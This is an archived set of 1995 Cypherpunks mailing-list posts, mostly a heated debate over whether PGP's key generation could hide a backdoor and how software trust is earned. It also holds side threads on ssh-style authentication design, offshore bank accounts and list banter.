> hardware, software, algorithm or protocol could ever be considered
> trustworthy by anyone for any purpose.  There is a difference between
> raising specific concerns and making vague, wild, unsupported claims,
> which is how what you wrote below reads to me.

A reasonable response.  My question is: Why do you think that the key
generation algorithm used by PGP is secure? Specifically, how do we know
there is no subtle back door that reduces the problem of testing the
typical key space to a solvable problem in today's technology?

I don't believe I made ANY "vague, wild, unsupported claims" however,
that is certainly a matter of opinion.

...
> >Why (specifically) do you think so? Because you claim it? Because the
> >MIT maintainer claims it? You say MIT is not associated with the NSA,
> >but they have historically been funded by the NSA and other federal
> >agencies for work on information security.  Do you really think that the
> >only information protected by PGP is dirty pictures? Do you somehow
> >think that MIT and the NSA are above that sort of thing? All you have to
> >do is look at history, and it should be clear that this appeal to
> >authority is often used by those trying to cover things up.  If you know
> >something about PGPs security that you aren't telling us, don't beat
> >around the bush about it.  Come out and say it.  Tell us that you have
> >proven that PGP has no backdoors and what method you used to do that. 
> >Tell us that you have hand verified all the code and that none of it
> >overwrites the key generation process and tell us how you verified it.
> 
> No one knows how "prove" anything substantial, much less the absence
> of backdoors, for anything but the most trivial software and
> algorithms.

Excellent - have you looked at the white paper describing the secure
"get-only" W3 server available under What's New at http://all.net? I
think that this is a step in the right direction toward demonstrating
more about a program than that it runs most of the time and seems to
give reasonable answers.  Perhaps someone would like to make similar
demonstrations for PGP.

> >It cannot be safely assumed that any program is clean or that any one
> >person or group is not involved with intentionally subverting security.
> >That violates the fundamental principles of information protection.
> 
> Your attempt to cast a near-defamatory shadow of suspicion over the
> individuals and institutions who wrote the software, without raising
> even a single specific concern about something you've observed about
> the code, invites more questions about your own motives than those of
> MIT or its staff.  It seems reasonable to ask you to put up or shut
> up.

Under what analysis do you construe "It cannot be safely assumed" as
"near-defamatory"?

I don't know you any more than you know me.  We are both just mail
sources on the Internet.  Why do you consider it reasonable to assume
that we should all trust statements made by people we do not know and
have not met based on their assertion that they think a cryptosystem is
safe and free of back doors?  If I add a PGP signature, does it make
me any more trustworthy?

> Disclaimer: I also give away cryptographic source code, in connection
> with my job as a research scientist for a company that has even closer
> ties to the spook community than you seem to think MIT has...

And I should trust you to tell me that PGP is safe for me to use?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 31 Jul 95 19:25:04 PDT
To: fc@all.net
Subject: a hole in PGP
In-Reply-To: <9508010103.AA06094@all.net>
Message-ID: <199508010220.AA08136@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: fc@all.net (Dr. Frederick B. Cohen)
   Date: Mon, 31 Jul 1995 21:03:49 -0400 (EDT)

   More accurately, you cannot prove a forall statement about an infinite
   set by demonstrating examples - but you can disprove it with a single
   refutation, however, your argument is incorrect in this context.

   Since computers current digital computers (and programs) are (close to)
   finite state machines, we can prove many forall statements.  But even

We can prove some "forall" statements; however, it is hard to tell
in advance whether any "forall" statement is one of these easily
provable or disprovable problems.

This is informally known as the halting problem.

   more to the point, it is the job of the person asking you to trust them
   to justify that trust.  If you trust them with a less-than-adequate
   basis, you have only yourself to blame when you get burned. 

Most of us consider the release of possibly imcriminating source code
to be a sign that the persons involved are worthy of trust.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 31 Jul 95 19:10:02 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Commercial killers
In-Reply-To: <ac42d528030210042967@[205.199.118.202]>
Message-ID: <199508010210.WAA28165@hermes.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| Harry Bartholomew was telling me a year or so ago about some ideas for
| detecting volume changes. I think, however, the problem of distinguishing
| commercial from non-commercial signal is, I think, a tough one.

	Yes, but the tv stations put in a short period of black &
silence before returning to the show.  I'm pretty confident that this
is what the 'zip through commercials' vcrs cue on.


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Mon, 31 Jul 95 19:31:45 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP
In-Reply-To: <9508010120.AA07073@all.net>
Message-ID: <199508010233.WAA26805@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>A reasonable response.  My question is: Why do you think that the key
>generation algorithm used by PGP is secure? Specifically, how do we know
>there is no subtle back door that reduces the problem of testing the
>typical key space to a solvable problem in today's technology?
>

I never said that I thought that PGP (or anything else) is "secure."
But to the extent that I do trust it for any given purpose, it is for
approximately the same reasons that I trust lots of other things that
I rely on.  I've spot checked some of the code - far from an
exhaustive analysis - and I've yet to discover anything myself that
points to any specific weakness.  I assume that others have done the
same, and I also assume that someone like me who did discover a
weakness would be likely, as I would be, to publish it and that
therefore I'd hear about it.  This is, for better or for worse, about
as much as can be said for almost anything in the cryptographic world.
Far from perfect, to be sure, but hardly unusual or unique to PGP.

...

>Under what analysis do you construe "It cannot be safely assumed" as
>"near-defamatory"?

Because you seem to be pointing a finger at specific people.  Your
recent messages imply (to me, at least) that you think one or more
members of the MIT PGP project may have deliberately tampered with
some of the PGP code.  You think the risk of this sort of thing having
occurred is especially great - greater than with other products, in
fact - with MIT PGP because of some (unspecified) connection you
believe MIT has with NSA.  (If I am mistaken here and you don't think
MIT PGP is at special risk, please clarify this - I suspect others got
the same impression).  PGP did not come from "MIT".  It came from
specific individuals who work there and who are named in the code and
documentation.  They have professional and personal reputations and
feelings just like we all do.  Some of these individuals are on or
close to this list.  To imply, without offering evidence, that these
people are somehow tainted and that their work should be especially
mistrusted is harmful and hurtful to them.  To use such implications
as the entire basis for claims about the security of or risks
associated with specific software does not move our understanding of
things forward.  Pointing out something specific, on the other hand,
would move things forward.  I think your "arguments" about this
subject so far have been vague, unscholarly, unprofessional,
needlessly personal, and just plain insulting.

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 31 Jul 95 20:38:53 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: There's a hole in your crypto, dear Eliza dear Eliza...
Message-ID: <Pine.ULT.3.91.950731222139.14616A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Alright, here's my 2 cents worth for this petty flamewar...

Once upon a time, there was PGP 2.3.  MIT had nothing to do with it.  The 
population of the net that used the program was fairly small.  In 
addition to being small, they were all (mostly) computer literate 
people.  These people were confident in the security of PGP because the 
had read and understood the source code.  It was checked and declared 
good. 

Then, in stepped MIT.

I, and a few others, raised concerns about a possible conflict of 
interest with MIT distributing the code, and encouraged everyone to 
double check the code for back doors and other NSA nasties.  It was 
checked and declared good.

Now, we are in the present.  MIT is still part of the equation.  However, 
the demographics of the net have chaged.  Fewer people are here that (by 
percentage) are computer literate to the level to do source code 
investigations.  A few question why they shoudl trust PGP when they don't 
know it's secure.  We, those who have grown up with PGP, point out that 
it is good, yet that really isn't a great reason to trust it.

So the question is, why shoudl non-technical people believe that PGP is 
good?  They don't have the skills to check it for themselves, and you 
have to admit that the associations of MIT with various TLAs are at the 
very least concerning.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMB2F0DokqlyVGmCFAQGhpgP9EIaGx3cHG78pFic0poPsgI/Yo1UNn6SY
gRG9kfx3M1XzWITND5m2ywUx1B9n48hGoPfgP9ISvGoXDd5/yHgsY6uEjzZCGaLU
tXzace1PvdjL5htH9prvh5GMoghCi34B9cDh01d1U2hKXEypj1pTRA+z+xWUfnGT
teMJ9uEaOu0=
=2aWA
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frenchie@magus.dgsys.com (SysAdmin)
Date: Mon, 31 Jul 95 19:42:54 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: [NOISE] was Re: a hole in PGP
In-Reply-To: <9508010103.AA06094@all.net>
Message-ID: <m0sd7IY-00027bC@magus.dgsys.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

My response to Dr. Frederick B. Cohen:


I rarely write ANYTHING to the list unless I think it's absolutly
necessary and has a semblence of Crypto (keeps the SNR down).
I'm looking forward to doing something similar to the crack RC4
thing again.
Anyway, after reading the crap below I have been forced to comment.
For an individual that parades the title of Doctor (and the indication 
of intelligence that title should imply) you seem to lack the grasp of what
has been stated over and over again. If you can't study the source code,
find somone that you trust that can! Prove it *doesn't* work before you
knock it.  
Lastly, this interpretation of a threat from being added to a killfile
was the last straw.
Tell the FBI I sent the following Dr.Cohen :   PLONK!
I never play nice.

ObCypherpunk: Anybody heard from Detweiller?


[snipped]

> > You're testing my patience. Feeling flush from my New Orleans road trip, I
> > went out and bought the commercial version of Eudora, filter-feature and
> > all, which means I'm just itching to test it. In other words, it means you
> > are flirting with the kill-file, the bozo-filter, more rudely, a
> > <plonk!ing>.
> 
> Ah!!! A threat.  You should be aware that threatening homocide is a form
> of assault.  I will be certain to tell the FBI your exact words...  "the
> kill-file, the bozo-filter, more rudely, a <plonk!ing>." sounds to me
> (and may well sound to them) like a threat to commit murder. 
> 
> > Play nice, Doc, or don't play at all.
> 
> I am being nice, but you are not.  Perhaps you should consider
> addressing the issues.
> 
> -- 
> -> See: Info-Sec Heaven at URL http://all.net
> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
> 


- -- 
==========================================================================
         PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request.
           As soon as any man says of the affairs of the state 
    " What does it matter to me? " the state may be given up for lost.
                    J.J.Rousseau - The Social Contract
GAT/E/O d++@>- H--- s: a29 C+++$ UL++++($) P+>+++ L++>++++ E W+++ N++ K- 
w---- O- M- V-- PS+ PE++ Y+ PGP+++ t 5+ X R* tv b++ DI++ D++ G++ e h+ r 
y++ [Geek Code v3.0] a.k.a [ root@magus.dgsys.com / vamagus@delphi.com]
==========================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Protect Your Privacy. Use PGP for all your E-mail security needs!

iQCVAwUBMB2UCLbmxeO+s+1xAQE4fAP/TbNWs17V0U8SVDpp6yaCFGnGelSt4mTL
rXFSChLRtiMq/TevfTi9xmDl0j0gDeXORcpQBWlDi0ZfoownpDxHJJab7u97KlB3
WFho1WGWMXU5kyz+g6HBayPHpckH035R4rmCvGZ1zw1qph2v9NzoDhR+8pTgkCYD
7bOQYV6CKMM=
=K1aG
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Mon, 31 Jul 95 20:44:59 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: U.S. Banks are not all that bad
In-Reply-To: <ac419fc0000210046951@[205.199.118.202]>
Message-ID: <Pine.3.89.9507312239.B21268-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


I might have missed the beginning of this thread, but noting the 
complaints that Lucky Green has made, I would submit that he may be 
dealing with a bank in deep financial straights.  The outrageous actions 
he charges follow exactly a pattern noted here in Austin a few years 
ago.  (During the S&L crisis.)  When banks start charging significant 
fees for mundane transactions, hit the exits at a run!  Ignore the major 
rating agencies, as they get their money from the banks. ;-)

IANAFA

Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 19:56:43 PDT
To: mab@crypto.com (Matt Blaze)
Subject: Re: a hole in PGP
In-Reply-To: <199508010233.WAA26805@crypto.com>
Message-ID: <9508010250.AA14743@all.net>
MIME-Version: 1.0
Content-Type: text


> >Under what analysis do you construe "It cannot be safely assumed" as
> >"near-defamatory"?
> 
> Because you seem to be pointing a finger at specific people.  Your
> recent messages imply (to me, at least) that you think one or more
> members of the MIT PGP project may have deliberately tampered with
> some of the PGP code.

I don't believe I actually said any such thing.  Perhaps you are not
reading (or I am not writing) carefully enough.  All I think I did was
ask why I should believe they have not when they or those like them have
done it before. 

>  You think the risk of this sort of thing having
> occurred is especially great - greater than with other products, in
> fact - with MIT PGP because of some (unspecified) connection you
> believe MIT has with NSA.  (If I am mistaken here and you don't think
> MIT PGP is at special risk, please clarify this - I suspect others got
> the same impression).

PGP is a product that is specifically disliked by the powers that be
because it provides free access to strong cryptography which is against
the public policy of the US government.  That means that people in that
same said government likely feel it is their duty to make certain that
they can still read PGP mail.

>  PGP did not come from "MIT".  It came from
> specific individuals who work there and who are named in the code and
> documentation.  They have professional and personal reputations and
> feelings just like we all do.  Some of these individuals are on or
> close to this list.  To imply, without offering evidence, that these
> people are somehow tainted and that their work should be especially
> mistrusted is harmful and hurtful to them.

I didn't mean to be hurtful, but I did and do mean to ask why we should
believe that PGP is secure.  Their blind faith is not adequate for the
level of trust being put in PGP - even if they are really sincere.

In terms of implication, I don't believe I implied any such thing.  I
only asked why we should trust them with our individual freedom.

>  To use such implications
> as the entire basis for claims about the security of or risks
> associated with specific software does not move our understanding of
> things forward.  Pointing out something specific, on the other hand,
> would move things forward.  I think your "arguments" about this
> subject so far have been vague, unscholarly, unprofessional,
> needlessly personal, and just plain insulting.

I obviously disagree, but I still haven't heard a single response along
the lines of "here's why we believe it is secure..." I have heard lots
of responses along the lines of "believe us or convince yourself..." and
"read a 'Request for Comments' and that explains it all", but those
leads have not panned out - so far, the RFC tells us that PGP is not
secure and the convince yourself argument holds no water.

The fact is, you seem to support the idea that PGP is secure without a
reasonable basis, and when pushed a bit harder, agree that it probably
is not secure. 

How is it "unscholarly, unprofessional, needlessly personal, and just
plain insulting" to question the idea that hundreds of thousands of
people are trusting their freedom to software that is probably not
secure? I think it is highly unprofessional to try to claim that PGP is
secure and to try to bolster that position by claiming that some
"Request for Comments" supports it when that same said RFC refutes it.

It has been my general impression that "scholarly" means, among other
things, questioning the status quo and finding out where the generally
accepted ideas break down.  I am a professional in the field of
information protection, and I consider it highly unprofessional in this
field to assume that systems are secure without ample evidence to
support it.

So far, I see no ample evidence to support the security of PGP's key
generation algorithm relative to the concerns I have expressed.  Those
concerns are fairly specific as far as I am concerned, but if you feel I
have to demonstrate a specific attack that works in order to question
the adequacy of protection, I think you have it backwards.

If the people at MIT feel personally insulted because I have questioned
their previously accepted ideas, it's just too bad.  I didn't say they
had bad breath or that they were arogant or that they were ugly, all I
said was that their professional opinions seem to lack adequate
foundation when subjected to scrutiny.  This is professional comment,
not a personal one. 

As far as the potential that they are working with the NSA to subvert
personal privacy, it is a potential, just as it is a potential that I am
working with the NSA to undermine confidence in PGP.  The issue is and
should be, why (specifically) do you believe that PGP is secure.

This is how professionals deal with these sorts of questions:

	If you do not believe it is secure, you should say why not.

	In my case, I question its security and have given at least one
	example of how it could be insecure.

	If you do believe it is secure, you should be able to support
	your contention with more than reference to RFCs, vague
	comments, and claiming that you have read the code and didn't
	catch anything.

	If you cannot specifically address my question, say so, tell us
	all that the security of PGP is an open question, and either
	leave it open or go after closing it.

	OR come up with another alternative that doesn't ignore my question,
	doesn't avoid the issue, doesn't appeal to authority that fails to
	adequately support your contentions, and doesn't claim that I an
	somehow unprofessional or scholarly for questioning an unproven
	contention.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Mon, 31 Jul 95 19:43:51 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Attacks on PGP
In-Reply-To: <ac42d74b05021004a9dd@[205.199.118.202]>
Message-ID: <199508010251.WAA26944@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


[good comments deleted]

>The lack of cryptanalysis papers at "Crypto" has been striking...I was told
>that the program committee considers cryptanalysis to be less important
>than original research. (I can see the rationale in this, as Crypto is an
>academic/research conference, and there are really no "engineering" crypto
>conferences. And cryptanalysis might not even fit into an engineering
>conference very well, as cryptanalysis is traditionally a sort of
>"hobbyist" activity--if you've read Kahn you'll know what I mean.)

Tim,

My impression (based on reviewing papers for the last few CRYPTOs and
EUROCRYPTs) is that the reason for the lack of "practical" papers is
primarily that not very many of them get submitted.  In fact, I think
there actually are a fair number of cryptanalysis papers at CRYPTO,
at least compared with the even smaller number of papers there that
describe new ciphers.  Anyway, cryptanalysis IS part of the mainstream
of the academic crypto world these days (consider differential
cryptanalysis, linear cryptanalysis, etc.)

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 31 Jul 95 20:58:44 PDT
To: hayden@krypton.mankato.msus.edu
Subject: There's a hole in your crypto, dear Eliza dear Eliza...
In-Reply-To: <Pine.ULT.3.91.950731222139.14616A-100000@krypton.mankato.msus.edu>
Message-ID: <199508010354.AA20144@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Why are the arguments on either side so emotional?

Because the alleged possible hole is located in the
random number generator portion of the code.

Random number generation (or more precisely, strong PRNG procedures)
are one of the "hot" buttons of this list in general: no matter how
strong the mechanism is, someone can postulate "a weakness in the
code" that produces "weak" PRN's or gigabuck NSA computers that can
reproduce arbitrary PRN streams. And noone can disprove anything.
Because nothing, really, can be "proved" to be random; it's that darn
halting problem again. All we have are "reasonable" expectations,
which aren't reasonable for a subset of the intended user group.

Okay... sometime this week I'll take a long look at the prng routines
in what PGP source code I have.

I'm doing this in order to keep an open mind, _not_ because I expect
to find anything.

Other than the labeled PRNG/RNG routines, what needs to be looked at?

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 20:04:22 PDT
To: frenchie@magus.dgsys.com (SysAdmin)
Subject: Re: [NOISE] was Re: a hole in PGP
In-Reply-To: <m0sd7IY-00027bC@magus.dgsys.com>
Message-ID: <9508010256.AA15130@all.net>
MIME-Version: 1.0
Content-Type: text


...
> Anyway, after reading the crap below I have been forced to comment.
> For an individual that parades the title of Doctor (and the indication 
> of intelligence that title should imply) you seem to lack the grasp of what
> has been stated over and over again. If you can't study the source code,
> find somone that you trust that can! Prove it *doesn't* work before you
> knock it.  

So you claim that software is secure unless it has been shown to be
insecure, while I claim it is insecure unless it has been shown to be
secure.  Which position do you think more sensible? (rhetorical
question, does not require any responses). 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 31 Jul 95 23:23:17 PDT
To: cypherpunks@toad.com
Subject: Re: ssh protocol
Message-ID: <199508010620.XAA28764@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Ghio wrote (on cypherpunks):
>I've been playing with the cryptotcp program available from utopia..  It
>has some bugs but works pretty well, if you don't mind waiting 20-30
>seconds at the beginning.  It does a Diffie-Hellman exchange and 3DES over
>telnet.  How hard would it be to add some sort of authentication to this
>program?

I haven't actually compiled the code (it's not very DOS-friendly), but it looks
easily modified; some parts of the problem are still hard, such as identifying
the client to the server.  Some issues to deal with for adding authentication:

0) RSAREF2.0 would have been nice, and comes with D-H and DES.

1) The option negotiation is simple but hard-coded; it would be easy to add
one thing at a time, but would benefit from a more flexible option-negotiator.
That would also let you pretend it was just a general-purpose telnet-with-
various-processors and avoid ITAR restrictions for the
authentication-plus-compression
bones version, but the authors, not being Yankees, don't have to worry about
that.

2) Authentication means that some process on each machine is willing to make
a digital signature using a private key - how do you store that key safely?
For a client operated by a human, that's not a big problem; for a server,
or a client operated by a program without a direct user-interface, it's harder.
Do you just leave the key in a file (trusting root?)  Do you only start the
server daemon by hand?  For most Unix applications, I suppose a root-read-only
file containing the key is OK, since if a cracker can read that file you've
got far more serious problems (and the cracker can take over your email anyway.)

3) One big difficulty in authentication systems is securely but conveniently
exchanging authentication parameters; you don't want to risk man-in-the-middle
by trusting keys you got from the other side (otherwise you could use plain
D-H),
but getting keys from a keyserver is slow and hard to integrate, and
requiring the other side to already have your key parameters limits your
usefulness.  

3A) How do you know who you're talking to so you know which authentication data
to use?  For the client, that's pretty easy - the client knows it's calling
server@foo.bar.edu, so it can get the keys in advance and not worry.
(It still needs the PGP web-of-trust or X.509 hierarchy to validate the keys.)
But how does the server know who the client is?  IP address?  What if it's
spoofed?
What if it does a DNS lookup, which gets spoofed?  You could use a password-file
equivalent, but that does mean you can only send mail to people who trust you?

3B) How do you do error recovery in PGP, i.e. you either can't find the
other side's
keys, or can find them but can't validate them because you don't have a web
of trust
that gets from you to them.  Do you just fail the call?  (That's secure but
boring.)
If you complete the call anyway, that means there's a major security risk,
which is that Bad Guys can spoof keys by sending you keys you can't validate.

3C) If you use X.509 hierarchical certification, you _can_ just hand across
the certificate instead of waiting for a PGP keyserver to respond, since the
web of trust is built-in if you're part of the same hierarchy, but there's
still the problem (for the server) of knowing whose certificate to use.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 31 Jul 95 23:23:45 PDT
To: Mike Bailey <bailey@computek.net>
Subject: Currency risk on bank accounts (Was: Zimmermann legal fund)
Message-ID: <199508010621.XAA28791@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> > > The US banking industry has gone to the dogs. The day a non-US bank
offers
>> > > an account that can be accessed over the net will be the day I close
my US
>> > > accounts.
Some of the Channel Island banks offer accounts with ATM cards;
I think some of them are in Jersey (you don't have to remind people
you didn't say _New_ Jersey :-)

>I open an account with U.S. $$ in a foreign bank who uses francs  ... a month 
>later the franc loses 20 % of it's value as compared to the U.S. dollar. 

Happens to me all the time - I deposit my money in a dollar-based account,
the dollar takes a dive relative to the Yen, so my account's worth 20% less
in new Japanese cars...   Most of the banks in major European banking
centers and other banking-haven countries will let you have accounts in your
choice of 
major currencies, and a number of the smaller countries have local currencies
that keep parity with the US dollar or British pound.  That means your account
really has X US dollars in it, not X-US-dollars-converted-to-francs-on-deposit,
or maybe X Bahamian dollars which are officially worth X US dollars but
may be harder to withdraw quickly.

There is still some risk that (for example) the Bahamas government may
decide to default on its foreign debt by suddenly declaring the Bahamas
dollar to no longer match US dollars, but you can only get away with that
sort of thing once, so it's a 
desperation move, the kind of thing you do just before or after the revolution.
You're more at risk from small private banks that are offering high rates of
interest on foreign deposits because they're ripping off their depositors,
e.g. BCCI or Nugan Hand, but that's more risk in the Caribbean than Europe
(where the big risk is that they're paying you less interest than you might
get in the US, or where the local tax on bank-interest may be higher than
your US tax rate.)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Mon, 31 Jul 95 21:33:51 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: OS noise  [Was: a hole in PGP]
In-Reply-To: <199508010213.AA07127@tyrell.net>
Message-ID: <Pine.3.89.9507312331.E21268-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Phil Fraering wrote:

> For better or for worse, we all must use programs (or collections
> of programs) that large or larger: even if PGP could be implemented
> in 1 % of the current source code, it would still be running in an
> operating system that's cramped in 4 megabytes of ram, because that's
> a characteristic of the common modern operating systems.

Ahem!  Commiedore APOLOGIED when it released its 512K OS a couple of 
years ago.  These things _don't_ have to be this large.

> The operating systems PGP is running in are larger than PGP itself;

Got that straight!

> which isn't a bad idea. This isn't meant to be a disendorsement of
> Unix.)

Oh, please!  Now that I'm back with my direct connection, I want another 
OS holy war!  I want to killfile LOTS of people (or two people in 
particular).

> What OS should I use to do this? Should I just give up on anything
> beyond TRS-DOS 6.2?

No!  Use UltraDos.  Much better!

Nathan

Now THAT's noise....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Mon, 31 Jul 95 20:33:43 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP
In-Reply-To: <9508010250.AA14743@all.net>
Message-ID: <199508010341.XAA27354@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


>> >Under what analysis do you construe "It cannot be safely assumed" as
>> >"near-defamatory"?
>> 
>> Because you seem to be pointing a finger at specific people.  Your
>> recent messages imply (to me, at least) that you think one or more
>> members of the MIT PGP project may have deliberately tampered with
>> some of the PGP code.
>
>I don't believe I actually said any such thing.  Perhaps you are not
>reading (or I am not writing) carefully enough.  All I think I did was
>ask why I should believe they have not when they or those like them have
>done it before. 

This speaks for itself.  "They or those like them," indeed!

...

>
>The fact is, you seem to support the idea that PGP is secure without a
>reasonable basis, and when pushed a bit harder, agree that it probably
>is not secure. 
>

I never made any claim that PGP is "secure".  Quite the contrary -
I've been complaining about the security implications of PGP's
monolithic structure and complexity since I first saw the code, though
I did state the basis on which I trust it little less than I trust
other software of equal complexity.  Primarily, however, I jumped in
to this discussion to take issue with your unfair implication that
there is reason to suspect deliberate wrongdoing on the part of the
MIT people.  If your remarks are based on some specific information
you know about some person or group, please tell us.  Otherwise, it
would be a shame allow your credibility to taint these people in the
backs of people's minds just for the sake of a casual, throwaway
rhetorical device.  There is no need to raise the specter of an evil
conspiracy to make your point.  It's irrelevant and beneath you, based
on what I've read of your earlier work on viruses.

Feel free to have the last word if you'd like, since we seem to AGREE
that PGP needs more analysis and scrutiny.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 20:58:04 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Stopped at the boarder
In-Reply-To: <ac42d74b05021004a9dd@[205.199.118.202]>
Message-ID: <9508010351.AA18289@all.net>
MIME-Version: 1.0
Content-Type: text


> Maybe Fred can tell us if it's really true
> that he was stopped by U.S. Customs and held for many hours at the Canadian
> border when going to or returning from a conference where he described
> computer viruses....

Not for many hours, but we had an interesting non-discussion, and there
was a really thorough search of my bags (every piece of paper was
individually examined in great detail and a guard was subtly added to
the other side of the line).  They looked at every slide, checked out
the bags themselves for secret compartments, but the one thing they
didn't do was check the contrnts of my floppy disks.  Istn't technology
wonderful?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 31 Jul 95 20:58:16 PDT
To: rsalz@osf.org
Subject: Re: Set phone permit "wire" taps
Message-ID: <9508010357.AA12449@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to keep cluttering up the list.  I'll try to make this my last
message in this thread.

You did not answer my request.  Of course you're under no obligation
to do so, but a claim like the following:
>I've been arrested too amy times, an done enough local, state, and
>federal time to know.
Is just too hard to accept without verification.  Please tell me, if not
the whole list, where and when you've been incarcerated -- preferably at
the federal level -- so that I can, say, call the warden and verify.

>Now SHOW ME something.

Sure, what? If you have more questions after looking at my homepage
http://www.osf.org/~rsalz/ let me know.  Or for more fun, here's my
SSN: 314-15-9265.

>You sure question a lotta credentials,
>like you've REALLY been somewhere or done something.

I don't see how these two parts relate, but I've never done anything cool
like you might be thinking of.  In my professional life I'm primarily a
programmer who's written lots of code, and been able to give away some of
it.

I just think you're a fake.

>Love Always,

Kisses to you too, but I'm still waiting for an answer.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Don M. Kitchen" <don@cs.byu.edu>
Date: Wed, 1 Nov 1995 09:22:23 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: ecash remailer
In-Reply-To: <199510311940.OAA31415@opine.cs.umass.edu>
Message-ID: <ML-1.3.1.807585540.6838.don@jacob.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>  > perpetrator, let's see... it's Ed.  Ed is now charged with theft and
>  > has an expensive and uncertain legal experience ahead of him.
>  
>  Alice-frames-Ed situation is functionally equivalent to the Bob-robs-Charlie
>  situation from the bank's perspective.

I suppose the word "receipt" might be handy to introduce into the entire
scheme. A dispute over who payed & who stole is solved with paperwork of some
sort. Although a digital signature is not necessarily valid (I don't even know
